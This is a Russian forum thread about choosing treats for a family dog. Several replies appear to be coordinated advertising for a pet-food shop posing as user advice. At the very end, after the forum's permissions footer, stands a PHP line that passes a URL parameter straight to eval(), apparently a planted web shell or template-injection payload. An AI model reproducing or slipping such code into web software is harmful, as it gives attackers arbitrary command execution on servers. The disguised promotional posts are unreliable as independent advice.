+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Лакомства для собаки


  1. #1
    Мимо проходил Balli is on a distinguished road Аватар для Balli
    Регистрация
    08.05.2019
    Сообщений
    16

    Лакомства для собаки

    В скором времени едем в гости к родителям. В прошлом году мы родителям подарили собаченку. Теперь он стал любимчиком и членом семьи. Стараются кормить пса всем самым лучшим, но не всегда это выходит. Когда мама узнала, что мы едем, то попросила привезти лакомство для любимца. А я понятия не имею, что купить. Не подскажете?

  2. #2
    Мимо проходил Agatangel is on a distinguished road Аватар для Agatangel
    Регистрация
    07.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    28
    Что бы что-то советовать по этому вопросу, нужно указать, какая порода собаки у родителей. Чем они ее кормят и что любит домашний любимец. Так же не мало важно то, где живет пес. Это уличное животное или нет. Укажите все эти моменты и потом услышите советы. А лучше зайдите в любой зоомагазин и там вам все подскажут.

  3. #3
    Мимо проходил Дагмер is on a distinguished road Аватар для Дагмер
    Регистрация
    15.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    19
    Я полностью согласен с предыдущим комментатором. Нужны детали, которые смогут помочь в подборе лакомства для животного. Но в любом случае вам нужно или сходить в зоомагазин или просто просмотреть информацию в интернете. Там тоже есть немало интересных предложений по этому вопросу. Как вариант, загляните сюда Как по мне, то ассортимент отличный, а вы смотрите сами. Думаю, подобрать что-то можно.

  4. #4
    Мимо проходил ГумбинМакс is on a distinguished road Аватар для ГумбинМакс
    Регистрация
    19.02.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    42
    Я почему бы вашим родителям не сказать вам конкретно, что купить. Не понимаю я подобных загадок. Купи лакомство! Акакое не сказали? Спросите! Только они знают, что любит их пес.

  5. #5
    Мимо проходил Valeria192 is on a distinguished road Аватар для Valeria192
    Регистрация
    24.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    31
    Для обеспечения здорового развития питомцев, обязательным условием является правильное, полноценное питание. Наш зоомагазин интернет предлагает лучшие корма для взрослых и маленьких животных, которые содержат в составе только натуральные ингредиенты (мясо, овощи, травы), обогащенные витаминами, минералами и микроэлементами, не содержат в составе консервантов, искусственных красителей, ароматизаторов, усилителей вкуса. Клиенты могут приобрести сухие корма, а также консервы для основного рациона, использующиеся в качестве дополнительного питания.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}